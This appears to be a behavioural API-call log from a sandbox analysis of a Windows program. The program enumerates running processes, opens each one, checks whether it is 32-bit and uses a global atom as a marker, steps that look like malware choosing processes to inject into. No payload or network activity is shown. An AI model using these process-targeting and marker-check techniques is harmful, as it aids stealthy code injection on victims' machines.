	[0070.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x230
	[0070.502] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.502] CloseHandle (hObject=0x230) returned 1
	[0070.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728818, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x230
	[0070.502] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.502] CloseHandle (hObject=0x230) returned 1
	[0070.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x230
	[0070.503] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.503] CloseHandle (hObject=0x230) returned 1
	[0070.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x230
	[0070.503] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.503] CloseHandle (hObject=0x230) returned 1
	[0070.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e7c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x230
	[0070.503] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.504] CloseHandle (hObject=0x230) returned 1
	[0070.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x230
	[0070.504] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.504] CloseHandle (hObject=0x230) returned 1
	[0070.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x230
	[0070.504] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.504] CloseHandle (hObject=0x230) returned 1
	[0070.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x230
	[0070.505] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.505] CloseHandle (hObject=0x230) returned 1
	[0070.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x230
	[0070.505] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.505] CloseHandle (hObject=0x230) returned 1
	[0070.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x230
	[0070.505] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.505] CloseHandle (hObject=0x230) returned 1
	[0070.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e810, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x230
	[0070.505] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.505] CloseHandle (hObject=0x230) returned 1
	[0070.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea40, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x230
	[0070.506] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.506] CloseHandle (hObject=0x230) returned 1
	[0070.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x230
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.506] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetLastError () returned 0x5
	[0070.507] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.507] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.507] GetProcessTimes (in: hProcess=0x230, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.508] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetLastError () returned 0x5
	[0070.509] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.510] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.510] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.510] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.510] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.510] CloseHandle (hObject=0x230) returned 1
	[0070.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x230
	[0070.510] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.510] CloseHandle (hObject=0x230) returned 1
	[0070.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea68, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x230
	[0070.511] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.511] CloseHandle (hObject=0x230) returned 1
	[0070.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16ae8) returned 0xc0000004
	[0070.599] VirtualAlloc (lpAddress=0x0, dwSize=0x16be8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0070.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16be8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0070.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0070.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x220
	[0070.643] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.643] CloseHandle (hObject=0x220) returned 1
	[0070.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7289b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x220
	[0070.644] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.644] CloseHandle (hObject=0x220) returned 1
	[0070.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a18, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x220
	[0070.644] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.644] CloseHandle (hObject=0x220) returned 1
	[0070.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x220
	[0070.644] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.644] CloseHandle (hObject=0x220) returned 1
	[0070.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
